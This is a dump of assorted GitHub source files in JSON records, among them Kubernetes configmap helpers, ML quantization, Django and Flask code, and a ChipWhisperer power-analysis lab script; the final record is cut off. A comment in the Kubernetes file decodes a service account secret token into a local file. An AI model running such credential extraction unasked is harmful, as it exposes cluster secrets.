+{"seq_id":"28152643454","text":"#!/usr/bin/env python3\r\n\"\"\"Take the code from wait_n and alter it into a new function task_wait_n\"\"\"\r\nfrom typing import List\r\n\r\ntask_wait_random = __import__('3-tasks').task_wait_random\r\n\r\n\r\nasync def task_wait_n(n: int, max_delay: int) -> List[float]:\r\n \"\"\"task_wait_n\"\"\"\r\n wList = []\r\n for i in range(n):\r\n wList.append(await task_wait_random(max_delay))\r\n return sorted(wList)\r\n ","repo_name":"maycolroa/holbertonschool-web_back_end","sub_path":"0x01-python_async_function/4-tasks.py","file_name":"4-tasks.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"31237061872","text":"import json\n\nfrom http.server import BaseHTTPRequestHandler\nfrom package.mongoServer import MongoServer\n\nDOCUMENT_MAIN_KEY = \"document\"\n\nclass Server(BaseHTTPRequestHandler):\n def __init__(self, request, client_address, server):\n print(\"testing\")\n self._mongo_server = MongoServer()\n super().__init__(request, client_address, server)\n\n def do_GET(self):\n self._set_response()\n\n def do_POST(self):\n document_post: dict = self._get_json_content_from_request()\n if document_post.get(DOCUMENT_MAIN_KEY) != None:\n self._mongo_server.write_document_to_database(document_post.get(DOCUMENT_MAIN_KEY))\n self._set_response()\n else:\n self._set_error_response(\"The json request does not have an document key!\")\n\n\n def _get_json_content_from_request(self) -> object:\n content_type = self.headers.get(\"content-type\")\n if content_type != \"application/json\":\n self._set_error_response(\"Bad formatted request! It is not an application/json.\")\n else:\n content_length = int(self.headers.get(\"content-length\"))\n return json.loads(self.rfile.read(content_length))\n\n def _set_response(self):\n self.send_response(200)\n self.end_headers()\n\n def _set_error_response(self, message: str):\n self.send_response(400, message)\n self.end_headers()","repo_name":"GoldenCodeRam/Project-Olive","sub_path":"database-backup-server/src/package/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"24913178583","text":"from math import log2\nfrom typing import Union\n\nimport torch\nfrom numpy import ndarray\nfrom torch import Tensor\n\nfrom .utils import my_clamp, my_round\n\n\ndef _integer_quantize(\n x: Union[Tensor, ndarray], width: int, frac_width: int, is_signed: bool = True\n):\n \"\"\"\n - Do linear quantization to input according to a scale and number of bits\n - Note that `bias` can be negative or larger than `bits`\n\n ---\n - forward: convert IEEE FP32/64 to fixed-point\n - backward: STE\n\n ---\n width: the bit width of the fixed-point number\n frac_width: the number of fractional bits. Note that `bias` can be negative or larger than `bits`\n\n ---\n For example: 0b101 . 00111, bits = 8, bias = 5\n\n \"\"\"\n if is_signed:\n int_min = -(2 ** (width - 1))\n int_max = 2 ** (width - 1) - 1\n else:\n int_min = 0\n int_max = 2**width - 1\n # thresh = 2 ** (width - 1)\n scale = 2**frac_width\n\n if isinstance(x, (Tensor, ndarray)):\n return my_clamp(my_round(x.mul(scale)), int_min, int_max).div(scale)\n elif isinstance(x, int):\n return x\n else:\n return my_clamp(my_round(x * scale), int_min, int_max) / scale\n\n\nclass IntegerQuantize(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x, width, frac_width, is_signed):\n return _integer_quantize(\n x, width=width, frac_width=frac_width, is_signed=is_signed\n )\n\n @staticmethod\n def backward(ctx, grad_output):\n \"\"\"\n STE shortcut for saving GPU memory\n \"\"\"\n return grad_output, None, None, None\n\n\ndef integer_quantizer(\n x: Union[Tensor, ndarray], width: int, frac_width: int, is_signed: bool = True\n):\n \"\"\"\n - Do linear quantization to input according to a scale and number of bits\n - Note that `bias` can be negative or larger than `bits`\n\n ---\n - forward: convert IEEE FP32/64 to fixed-point\n - backward: STE\n\n ---\n width: the bit width of the fixed-point number\n frac_width: the number of fractional bits. Note that `bias` can be negative or larger than `bits`\n\n ---\n For example: 0b101 . 00111, bits = 8, bias = 5\n\n \"\"\"\n return IntegerQuantize.apply(x, width, frac_width, is_signed)\n\n\ndef integer_fraction(\n width: int, frac_choices: list, min_value: float, max_value: float\n):\n max_half_range = max(abs(min_value), abs(max_value))\n int_width = int(log2(max(0.5, max_half_range))) + 2\n frac_width = max(0, width - int_width)\n frac_width = max(filter(lambda x: x <= frac_width, frac_choices))\n return frac_width\n","repo_name":"ChengZhang-98/llm-mixed-q","sub_path":"src/llm_mixed_q/models/quantize/quantizers/integer.py","file_name":"integer.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"71352540384","text":"from kubernetes import client, config\nfrom kubernetes.client import ApiClient\nfrom kubernetes.client.rest import ApiException\nimport yaml\nimport json\n\nconfig.load_kube_config()\nv1 = client.CoreV1Api()\n\ndef __format_data_for_create_configmap(client_output):\n temp_dict={}\n temp_list=[]\n json_data=ApiClient().sanitize_for_serialization(client_output)\n \n if type(json_data) is str:\n print(\"FORMAT_DATA :{}\".format(type(json_data)))\n json_data = json.loads(json_data)\n temp_list.append(json_data)\n return temp_list\n\ndef create_configmap(yaml_body=None,namespace=\"default\"):\n try:\n yaml_data=open(\"config.yaml\", \"rb\").read().decode('utf-8')\n yaml_body=yaml.safe_load(yaml_data)\n resp = v1.create_namespaced_config_map(\n body=yaml_body, namespace=\"{}\".format(namespace))\n\n data=__format_data_for_create_configmap(resp)\n print (data) \n except ApiException as e:\n print(\"ERROR IN create_configmap:\\n{}\".format(e.body))\n print(\"TYPE :{}\".format(type(e)))\n return __format_data_for_create_configmap(e.body)\n\ndef update_configmap(k8s_object_name=None,yaml_body=None,namespace=\"default\"):\n try:\n yaml_data=open(\"change_config.yaml\", \"rb\").read().decode('utf-8')\n yaml_body=yaml.safe_load(yaml_data)\n resp = v1.patch_namespaced_config_map(\n name=k8s_object_name,\n body=yaml_body, \n namespace=\"{}\".format(namespace))\n\n data=__format_data_for_create_configmap(resp)\n return data\n except ApiException as e:\n print(\"ERROR IN create_deployment:\\n{}\".format(e.body))\n print(\"TYPE :{}\".format(type(e)))\n return __format_data_for_create_configmap(e.body)\n\ndef delete_configmap(k8s_object_name=None,namespace=\"default\"):\n try:\n resp = v1.delete_namespaced_config_map(\n name=k8s_object_name,\n namespace=\"{}\".format(namespace),\n body=v1.delete_namespaced_config_map(k8s_object_name, namespace)\n )\n except ApiException as e:\n print(\"ERROR IN create_deployment:\\n{}\".format(e.body))\n print(\"TYPE :{}\".format(type(e)))\n return __format_data_for_create_configmap(e.body)\n\n# export secret=$(kubectl get serviceaccount default -o json | jq -r '.secrets[].name')\n# kubectl get secret $secret -o yaml | grep \"token:\" | awk {'print $2'} | base64 -d > token\n# APISERVER=$(kubectl config view | grep server | cut -f 2- -d \":\" | tr -d \" \")\nif __name__ == '__main__':\n create_configmap(\"default\")\n #update_configmap(k8s_object_name=\"munish\")\n #delete_configmap(k8s_object_name=\"munish\")","repo_name":"mumehta/python-k8s","sub_path":"test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"21691335937","text":"from django.urls import path\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n\nfrom . import views\n\nurlpatterns = [\n path('', views.posts),\n path('create/', views.create_post),\n path('my-posts/', views.my_posts),\n path('/', views.post),\n path('/delete/', views.delete_post),\n path('/edit/', views.edit_post),\n]\n","repo_name":"safwantaliparamba/Blog-App","sub_path":"Backend/api/v1/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"6962660575","text":"from openerp import api, models\nfrom odoo.exceptions import UserError\n\n\nclass PaymentCnabReport(models.AbstractModel):\n _name = 'report.br_payment_invoice.report_cnab_payment_invoice'\n\n @api.model\n def get_report_values(self, docids, data=None):\n report = self.env['ir.actions.report']._get_report_from_name(\n 'br_payment_invoice.report_cnab_payment_invoice')\n lines = []\n docs = []\n for docid in docids:\n doc = self.env['account.invoice'].browse(docid)\n docs.append(doc)\n lines.append(doc.get_order_line())\n docargs = {\n 'doc_ids': docids,\n 'doc_model': report.model,\n 'docs': self,\n 'lines': lines,\n }\n if not lines:\n raise UserError(\n \"Este documento ainda não possui um comprovante de pagamento.\")\n return docargs\n","repo_name":"mamcode/wbsfoosbr","sub_path":"br_payment_invoice/reports/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"24333903315","text":"import pygame\r\n\r\npygame.init()\r\n\r\n#display dimensions\r\ndisplay_width = 1200\r\ndisplay_height = 640\r\n\r\n#colour\r\nblack = (0, 0, 0)\r\nwhite = (255, 255, 255)\r\nred = (230, 0, 0)\r\nbright_red = (255, 0, 0)\r\nlight_brown = (139, 69, 19)\r\nmidnight_blue = (25, 25, 112)\r\ngrey = (128, 128, 128)\r\nlight_grey = (192, 192, 192)\r\ncardboard_brown = (165, 136, 85)\r\nmint_green = (152, 255, 152)\r\ntan = (196,144,124)\r\npeach = (255,224,189)\r\n\r\n#player\r\nplx = 500\r\nply = 250\r\nxmov = 0\r\nymov = 0\r\nms = 2\r\n\r\n\r\ndisplayScreen = pygame.display.set_mode((display_width,display_height))\r\npxa = pygame.PixelArray(displayScreen)\r\npygame.display.set_caption('Test')\r\nclock = pygame.time.Clock()\r\n\r\nkeys = pygame.key.get_pressed()\r\n\r\ndef character():\r\n global plx, ply\r\n pygame.draw.rect(displayScreen, tan, (plx+8, ply-10, 20, 10))\r\n head = pygame.draw.ellipse(displayScreen, peach, (plx-7, ply-55, 50, 50))\r\n pygame.draw.rect(displayScreen, black, (plx+8, ply-32, 4, 8))\r\n pygame.draw.rect(displayScreen, black, (plx+24, ply-32, 4, 8))\r\n pygame.draw.rect(displayScreen, black, (plx, ply, 36, 40))\r\n pygame.draw.rect(displayScreen, red, (plx+10, ply, 16, 40))\r\n pygame.draw.polygon(displayScreen, black, ((plx,ply),(plx,ply+10),(plx-22,ply+20)))\r\n pygame.draw.polygon(displayScreen, black, ((plx+36,ply),(plx+36,ply+10),(plx+54,ply+20)))\r\n pygame.draw.rect(displayScreen, black, (plx+3, ply+40, 10, 30))\r\n pygame.draw.rect(displayScreen, black, (plx+22, ply+40, 10, 30))\r\n #pxa[10, 20] = black\r\n\r\n\r\n \r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n xmov = 0\r\n ymov = 0\r\n ms = 1\r\n\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_a]:\r\n xmov = -1\r\n if keys[pygame.K_d]:\r\n xmov = 1\r\n if keys[pygame.K_w]:\r\n ymov = -1\r\n if keys[pygame.K_s]:\r\n ymov = 1\r\n\r\n\r\n plx += xmov * ms\r\n ply += ymov * ms\r\n\r\n displayScreen.fill(white)\r\n character()\r\n pygame.display.update()\r\n\r\n","repo_name":"josephz03/CPT-Game","sub_path":"Development/Movement.py","file_name":"Movement.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"33390912641","text":"from lxml import etree as et\nimport nltk\nimport xml.etree.cElementTree as ET\nimport csv\nimport ast\nimport time\nfrom nltk import word_tokenize\n\n\n# necessary for named entity recognition. The xml corpus is reformed into plain text format\ndef create_text():\n parser = et.XMLParser(encoding='iso-8859-5', recover=True)\n tree = et.parse(\"../corpora/ukwac1_fixed.xml\", parser)\n\n root = tree.getroot()\n\n with open(\"../xml_as_text_for_ner.txt\", \"w\") as txt_out:\n\n for txt in root.findall('text'):\n for sentence in txt.findall('s'):\n sent = \"\"\n\n is_single_open = False\n\n line = sentence.text.split('\\n')\n\n for word, next_word in zip(line, line[1:] + [line[0]]):\n if word == '':\n continue\n\n word = word.split('\\t')\n next_word = next_word.split('\\t')\n\n if next_word[0] in [\",\", \".\", \"'\", \")\"]:\n sent += word[0]\n elif next_word[0] == \"n't\":\n sent += word[0]\n elif next_word[0] == \"'re\":\n sent += word[0]\n elif next_word[0] == \"'s\":\n sent += word[0]\n elif next_word[0] == \"'ll\":\n sent += word[0]\n elif next_word[0] == \":\":\n sent += word[0]\n elif word[0] == \"(\":\n sent += word[0]\n elif word[0] == \"'\":\n if is_single_open:\n sent += word[0] + \" \"\n is_single_open = False\n else:\n sent += word[0]\n is_single_open = True\n else:\n sent += word[0] + \" \"\n txt_out.write(sent+\"\\n\")\n\n\n# creates a vocabulary xml file for easier processing\ndef create_vocabulary_xml():\n with open(\"../O2_match_vocabulary_to_sentences/matched_vocabulary.csv\", 'r') as voc_in:\n sent_reader = csv.reader(voc_in, delimiter=';')\n next(sent_reader)\n\n voc_root = ET.Element(\"root\")\n pos_root = ET.Element(\"root\")\n\n pos_list = []\n for v_row in sent_reader:\n\n voc_doc = ET.SubElement(voc_root, \"vocable\", name=v_row[1].replace(\"\\“\", \""\"))\n ET.SubElement(voc_doc, \"lemma\", name=v_row[5].replace(\"\\“\", \""\"))\n ET.SubElement(voc_doc, \"chapter\", name=v_row[15])\n ET.SubElement(voc_doc, \"book\", name=v_row[16])\n ET.SubElement(voc_doc, \"pos\", name=(str(v_row[7]).replace(\"\\“\", \""\")))\n\n tuple_pair = ast.literal_eval(v_row[7])\n #print(tuple_pair)\n for tp in tuple_pair:\n if isinstance(tp, list):\n print(tp)\n for t in tp:\n #print(t)\n pos_list.append((str(t[0]).replace(\"\\“\", \""\"),\n str(t[1]).replace(\"\\“\", \""\"),\n v_row[15],\n v_row[16]))\n else:\n #print(tp)\n pos_list.append((str(tp[0]).replace(\"\\“\", \""\"),\n str(tp[1]).replace(\"\\“\", \""\"),\n v_row[15],\n v_row[16]))\n\n pos_list_set = list(set(pos_list))\n for pos_tuple in pos_list_set:\n pos_doc = ET.SubElement(pos_root, \"lemma\", name=pos_tuple[0])\n ET.SubElement(pos_doc, \"pos\", name=pos_tuple[1])\n ET.SubElement(pos_doc, \"chapter\", name=pos_tuple[2])\n ET.SubElement(pos_doc, \"book\", name=pos_tuple[3])\n tree_voc = ET.ElementTree(voc_root)\n tree_pos = ET.ElementTree(pos_root)\n tree_voc.write(\"./input/voc.xml\")\n tree_pos.write(\"./input/lemma_chap_book_pos.xml\")\n voc_in.close()\n\nif __name__ == \"__main__\":\n # create_text()\n create_vocabulary_xml()\n","repo_name":"Mells/Preprocess03","sub_path":"O3_extract_sentences_from_corpus/00_preprocess.py","file_name":"00_preprocess.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"40514565210","text":"import numpy as np\n\ndef selectThreshold(yval, pval):\n #SELECTTHRESHOLD Find the best threshold (epsilon) to use for selecting\n #outliers\n # [bestEpsilon bestF1] = SELECTTHRESHOLD(yval, pval) finds the best\n # threshold to use for selecting outliers based on the results from a\n # validation set (pval) and the ground truth (yval).\n #\n \n bestEpsilon = 0\n bestF1 = 0\n F1 = 0\n \n stepsize = (max(pval) - min(pval)) / 1000\n for epsilon in np.arange(min(pval),max(pval),stepsize):\n # ====================== YOUR CODE HERE ======================\n # Instructions: Compute the F1 score of choosing epsilon as the\n # threshold and place the value in F1. The code at the\n # end of the loop will compare the F1 score for this\n # choice of epsilon and set it to be the best epsilon if\n # it is better than the current choice of epsilon.\n # \n # Note: You can use predictions = (pval < epsilon) to get a binary vector\n # of 0's and 1's of the outlier predictions\n \n tp, fp, fn = 0,0,0\n prec, rec = 0,0\n \n predictions = pval < epsilon\n predictions = np.reshape(predictions, (yval.shape))\n\n # predict anomaly & actual anomaly\n tp = sum((predictions == 1) & (yval == 1))\n \n # predict anomaly & actual nonanomaly\n fp = sum((predictions == 1) & (yval == 0))\n \n # predict nonanomaly & actual anomaly\n fn = sum((predictions == 0) & (yval == 1))\n\n # RuntimeWarning: invalid value encountered in true_divide\n # 0으로 나누는 것을 방지하기 위해 dummy 를 분모에 더해준다.\n dummy = 1e-7\n\n prec = tp / (tp + fp + dummy)\n rec = tp / (tp + fn + dummy)\n F1 = 2 * prec * rec / (prec + rec + dummy)\n # =============================================================\n \n if F1 > bestF1:\n bestF1 = F1\n bestEpsilon = epsilon\n \n return bestEpsilon, bestF1","repo_name":"jo1jun/Machine-Learning-Python","sub_path":"ex8/selectThreshold.py","file_name":"selectThreshold.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"71089736223","text":"# Example of how to work with model predictions...\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nresults_csv = '../data/test_results_transformer_moves.csv'\n# results_csv = '../data/test_results_stockfish_score.csv'\ndf = pd.read_csv(results_csv)\n\np_correct = df[df['move_played'] == True]['p_model']\navg_nll = np.average(-np.log(p_correct))\nprint('NLL:', avg_nll)\n\nplt.hist(p_correct, color='k', bins=np.geomspace(1e-5, 1e0, 21), rwidth=0.8, zorder=10)\nplt.xscale('log')\nplt.grid()\nplt.show()\n","repo_name":"gregdeon/cpsc-540-ml","sub_path":"project/analysis/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"12649474057","text":"#!/usr/bin/python3\n\"\"\"\nClass BaseModel module\n\"\"\"\nimport uuid\nfrom datetime import datetime\nimport models\n\n\nclass BaseModel:\n \"\"\"\n Defines all common attributes/methods for other classes\n \"\"\"\n def __init__(self, *args, **kwargs):\n \"\"\"\n Class contractor\n\n Args:\n args - positional arguments\n kwargs - key value pair arguments\n \"\"\"\n \n if kwargs:\n format_str = '%Y-%m-%dT%H:%M:%S.%f'\n for key, value in kwargs.items():\n if key == '__class__':\n continue\n elif key == 'created_at':\n self.created_at = datetime.strptime(\n kwargs['created_at'], format_str)\n elif key == 'updated_at':\n self.updated_at = datetime.strptime(\n kwargs['updated_at'], format_str)\n else:\n setattr(self, key, value)\n else:\n self.id = str(uuid.uuid4())\n self.created_at = datetime.now()\n self.updated_at = datetime.now()\n models.storage.new(self) \n\n def __str__(self):\n \"\"\"Returns string representation of BaseModel instances\"\"\"\n\n clsName = self.__class__.__name__\n return \"[{}] ({}) {}\".format(clsName, self.id, self.__dict__)\n\n def save(self):\n \"\"\"Updates the attribute updated_at with the current datetime\"\"\"\n self.updated_at = datetime.now()\n models.storage.save()\n\n def to_dict(self):\n \"\"\"Returns a dictionary that contains all\n keys values pair of the instance\"\"\"\n my_dict = self.__dict__.copy()\n my_dict['updated_at'] = self.updated_at.isoformat()\n my_dict['created_at'] = self.created_at.isoformat()\n my_dict['__class__'] = self.__class__.__name__\n return my_dict\n","repo_name":"DOREENKDAVID/AirBnB_clone","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"26839861583","text":"from rest_framework.permissions import BasePermission, SAFE_METHODS\nfrom rest_framework.request import Request\nfrom rest_framework.views import APIView\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom api.v1.comparisons.models import ComparisonGroup, Comparison\n\n\nclass IsComparisonGroupAuthorOrReadOnly(BasePermission):\n def has_object_permission(\n self, request: Request, view: APIView, comparison_group: ComparisonGroup\n ) -> bool:\n return bool(\n request.method in SAFE_METHODS or request.user == comparison_group.author\n )\n\n\nclass IsComparisonCreatorOrReadOnly(BasePermission):\n def has_object_permission(\n self, request: Request, view: APIView, comparison: Comparison\n ) -> bool:\n return bool(\n request.method in SAFE_METHODS or request.user == comparison.creator\n )\n\n\nclass IsAuthorOfComparisonPassedInBodyIfExists(BasePermission):\n def has_permission(self, request: Request, view: GenericViewSet) -> bool:\n try:\n comparison_group = ComparisonGroup.objects.get(\n id=request.data[\"comparison_group_id\"]\n )\n return bool(\n request.method in SAFE_METHODS\n or request.user == comparison_group.author\n )\n except (KeyError, ComparisonGroup.DoesNotExist):\n return True\n","repo_name":"FCTL3314/HealthNutrition-Backend","sub_path":"api/v1/comparisons/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
+{"seq_id":"7720390600","text":"class Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n hp = []\n ans = 0\n intervals.sort(key=lambda x:x[0])\n \n for s,e in intervals:\n if hp and s>=hp[0][0]:\n heappop(hp)\n heappush(hp,(e,(s,e)))\n ans = max(ans,len(hp))\n return ans","repo_name":"sudo-vaibhav/leetcode-solutions","sub_path":"0253-meeting-rooms-ii/0253-meeting-rooms-ii.py","file_name":"0253-meeting-rooms-ii.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"12514021794","text":"import os\nfrom tkinter.tix import MAX\nimport cv2\nimport imageio\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\nfrom glob import glob\nfrom utils.argmaxMeanIOU import ArgmaxMeanIOU\nfrom tensorflow import keras, argmax\nfrom utils.dataset import CATEGORIES_COLORS\n\nIMG_SIZE = (720, 480)\nOUTPUT_SIZE = (450, 300)\n\nVIDEO_PATH = r\"F:\\ROAD_VIDEO\\CLIP\\*\"\nMODEL_PATH = r\"./trained_models/AttentionResUNet-F16_MultiDataset_384-384_epoch-60_loss-0.31_miou_0.54.h5\"\n\nSHOW_FRAMES = False\nEXPORT_GIF = True\nMAX_60SEC = True\nMAX_BATCH_SIZE = 25\n\nGIF_DURATION = 40\n\nif __name__ == \"__main__\":\n\n for model_path in glob(MODEL_PATH):\n\n segmentation_model = keras.models.load_model(model_path, custom_objects={'ArgmaxMeanIOU': ArgmaxMeanIOU})\n segmentation_model_size = segmentation_model.get_layer(index=0).input_shape[0][1:-1][::-1]\n\n # video_path = r\"F:\\ROAD_VIDEO\\CLIP\\ombre complexe + croisement de route.mp4\"\n for video_path in glob(VIDEO_PATH):\n\n video_name = os.path.basename(video_path)\n model_name = os.path.basename(model_path)\n\n video_capture = cv2.VideoCapture(video_path)\n\n frame_count = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT))\n\n image_lst = []\n\n i = 0\n\n img_for_process = []\n\n with tqdm(total=frame_count, desc=\"Video : \" + video_name) as pbar:\n\n while video_capture.isOpened():\n ret, frame = video_capture.read()\n\n i += 1\n\n if not ret or (MAX_60SEC and i > 120 * 10):\n print(\"Error while reading the video.\")\n break\n\n img_resized = cv2.resize(frame, segmentation_model_size, interpolation=cv2.INTER_AREA)\n img_resized = cv2.cvtColor(img_resized, cv2.COLOR_RGB2BGR)\n\n img_for_process.append(img_resized)\n\n if len(img_for_process) == MAX_BATCH_SIZE:\n\n img_for_process = np.array(img_for_process)\n\n result_batch = segmentation_model.predict(img_for_process / 255. )\n\n for i in range(MAX_BATCH_SIZE):\n\n img_resized = img_for_process[i]\n result_segmentation = result_batch[i]\n\n # Argmax\n result_segmentation = argmax(result_segmentation, axis=-1)\n segmentation = np.zeros(result_segmentation.shape + (3,), dtype=np.uint8)\n for categorie in CATEGORIES_COLORS.keys():\n segmentation[result_segmentation == categorie] = CATEGORIES_COLORS[categorie][\"color\"]\n\n if segmentation_model_size != OUTPUT_SIZE:\n img_resized = cv2.resize(img_resized, OUTPUT_SIZE, interpolation=cv2.INTER_AREA)\n segmentation = cv2.resize(segmentation, OUTPUT_SIZE, interpolation=cv2.INTER_AREA)\n\n overlay_segmentation = cv2.addWeighted(img_resized, 0.7, segmentation, 0.7, 0.52)\n output_image = cv2.hconcat([img_resized, segmentation, overlay_segmentation])\n\n image_lst.append(output_image)\n\n if SHOW_FRAMES:\n cv2.imshow(\"self.EVT_SEGMENTATION_IMAGE\", cv2.cvtColor(segmentation, cv2.COLOR_RGB2BGR))\n cv2.imshow(\"self.EVT_ROAD_IMAGE\", cv2.cvtColor(img_resized, cv2.COLOR_RGB2BGR))\n cv2.imshow(\"output_image\", cv2.cvtColor(output_image, cv2.COLOR_RGB2BGR))\n\n if cv2.waitKey(1) == ord('q'):\n break\n\n pbar.update(1)\n\n img_for_process = []\n\n pbar.close()\n\n if EXPORT_GIF:\n print(\"Printing GIF\")\n imageio.mimsave('./image/' + video_name + \"---\" + model_name + '.gif', image_lst, fps=40, subrectangles=True)\n print(\"GIF saved\")","repo_name":"n-rocher/RoadSegmentation","sub_path":"tools/to_gif.py","file_name":"to_gif.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"9049325862","text":"'''\nHelper functions\n'''\nimport numpy as np\nimport cv2\n\n\ndef sliding_window(img, window_size, step_size):\n \"\"\"slide a window across the image and yield windows data iteratively\"\"\"\n for y in xrange(0, img.shape[0], step_size[1]):\n for x in xrange(0, img.shape[1], step_size[0]):\n # yield current window\n # NOTE: this window may be smaller than expected window_size\n yield (x, y, img[y:y + window_size[1], x:x + window_size[0]])\n\n\ndef sliding_window_faster(img, window_size, step_size):\n \"\"\"silde a window across the image and\n return the standard windows tensor with xy\"\"\"\n standard_windows = []\n x_vec, y_vec = [], []\n for y in xrange(0, img.shape[0], step_size[1]):\n for x in xrange(0, img.shape[1], step_size[0]):\n window = img[y:y + window_size[1], x:x + window_size[0]]\n if window.shape == (window_size[1], window_size[0]):\n x_vec.append(x)\n y_vec.append(y)\n standard_windows.append(window)\n\n return x_vec, y_vec, standard_windows\n\n\ndef pyramid(img, downscale=1.5, min_size=(30, 30)):\n \"\"\"compute image pyramid through down sampling\"\"\"\n # min_size: (w, h)\n yield img\n\n while True:\n h = int(img.shape[0] / downscale)\n w = int(img.shape[1] / downscale)\n img = cv2.resize(img, (w, h))\n\n if img.shape[0] < min_size[1] or img.shape[1] < min_size[0]:\n break\n\n yield img\n\n\ndef draw_detections(img, detections):\n for det in detections:\n cv2.rectangle(img, (det[0], det[1]), (det[2], det[3]),\n color=(0, 0, 0), thickness=2)\n\n cv2.imshow('detection', img)\n cv2.waitKey(0)\n\n\ndef find_biggest_window(detections):\n \"\"\"find the biggest bounding window from detections matrix\"\"\"\n x1 = detections[:, 0]\n y1 = detections[:, 1]\n x2 = detections[:, 2]\n y2 = detections[:, 3]\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n idx = np.argmax(area)\n\n return detections[idx]\n\n\ndef get_overlap(box1, box2):\n \"\"\"compute the overlap of box1 and box2 comparing to box1 area\"\"\"\n area = (box1[2] - box1[0] + 1.0) * (box1[3] - box1[1] + 1.0)\n xx1 = max(box1[0], box2[0])\n yy1 = max(box1[1], box2[1])\n xx2 = min(box1[2], box2[2])\n yy2 = min(box1[3], box2[3])\n w = max(0, xx2 - xx1)\n h = max(0, yy2 - yy1)\n\n return w * h / area\n","repo_name":"xueeinstein/it-shoes","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"27538282334","text":"SCOPETYPE = 'OPENADC'\nPLATFORM = 'CWLITEXMEGA'\nCRYPTO_TARGET='TINYAES128C'\nSS_VER='SS_VER_1_1'\n\nexec(open(\"basic_setup.py\").read())\n\ncw.program_target(scope, prog, \"../hardware/victims/firmware/simpleserial-aes/simpleserial-aes-CWLITEXMEGA.hex\".format(PLATFORM))\n\n\nimport numpy as np\nimport time\n\nktp = cw.ktp.Basic()\ntrace_array = []\ntextin_array = []\n\nkey, text = ktp.next()\n\ntarget.set_key(key)\n\nN = 100\nfor i in range(N):\n scope.arm()\n if text[0] & 0x01:\n text[0] = 0x0F\n else:\n text[0] = 0x00\n target.simpleserial_write('p', text)\n \n ret = scope.capture()\n if ret:\n print(\"Target timed out!\")\n continue\n \n response = target.simpleserial_read('r', 16)\n \n trace_array.append(scope.get_last_trace())\n textin_array.append(text)\n \n key, text = ktp.next()\n\n\n#MAIN\n\nassert len(trace_array) == 100\nprint(\"✔️ OK to continue!\")\n\none_list = []\nzero_list = []\nfor i in range(len(trace_array)):\n if textin_array[i][0] == 0x00:\n one_list.append(trace_array[i])\n else:\n zero_list.append(trace_array[i])\n\none_avg = np.mean(one_list, axis = 0)\nzero_avg = np.mean(zero_list, axis = 0)\n\ndiff_avg = one_avg - zero_avg\n\nimport matplotlib.pyplot as plt\nplt.plot(diff_avg)\nplt.show()","repo_name":"VladTalmaciu/CW_tests","sub_path":"scripts/lab_3_1.py","file_name":"lab_3_1.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"25948586580","text":"from operator import attrgetter\n\nfrom flask import abort, request\n\nfrom ...services.brand import service as brand_service\nfrom ...services.orga import service as orga_service\nfrom ...services.orga import birthday_service as orga_birthday_service\nfrom ...services.user import service as user_service\nfrom ...util.export import serialize_to_csv\nfrom ...util.framework.blueprint import create_blueprint\nfrom ...util.framework.flash import flash_success\nfrom ...util.templating import templated\nfrom ...util.views import redirect_to, respond_no_content, textified\n\nfrom ..authorization.decorators import permission_required\nfrom ..authorization.registry import permission_registry\nfrom ..orga_team_admin.authorization import OrgaTeamPermission\n\nfrom .authorization import OrgaBirthdayPermission, OrgaDetailPermission\nfrom .forms import OrgaFlagCreateForm\n\n\nblueprint = create_blueprint('orga_admin', 